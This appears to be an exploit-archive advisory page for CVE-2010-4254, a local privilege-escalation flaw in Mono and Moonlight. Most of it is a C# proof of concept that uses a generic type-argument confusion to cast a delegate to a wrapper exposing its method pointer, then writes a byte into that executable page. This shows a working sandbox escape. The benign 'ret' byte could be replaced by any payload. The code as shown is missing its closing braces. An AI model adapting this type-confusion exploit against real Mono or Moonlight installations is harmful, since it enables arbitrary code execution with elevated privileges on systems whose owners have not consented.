Mono/Moonlight Generic Type Argument Local Privilege Escalation - [CVE: 2010-4254]

2011-01-11 09:15:22


Mono and Moonlight is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer.


using System;
using System.Reflection;
using System.Runtime.InteropServices;

public class DelegateWrapper {
public IntPtr method_ptr;

public delegate void MethodWrapper ();

public class BreakSandbox {
private static DelegateWrapper Convert <T> (T dingus) where T :
DelegateWrapper {
return dingus;

private static DelegateWrapper ConvertDelegate (Delegate del) {
var m = typeof (BreakSandbox).GetMethod ("Convert",
BindingFlags.NonPublic | BindingFlags.Static);
var gm = m.MakeGenericMethod (typeof (Delegate));

var d = (Func <Delegate, DelegateWrapper>) Delegate.CreateDelegate
(typeof (Func <Delegate, DelegateWrapper>), null, gm);

return d (del);

public static void Main (string [] args) {
MethodWrapper d = delegate {
Console.WriteLine ("Hello");

d ();
var converted = ConvertDelegate (d);
// Overwrite the already WX page with a 'ret'
Marshal.WriteByte (converted.method_ptr, (byte) 0xc3);
d ();


No fixes

In order to submit a new fix you need to be registered.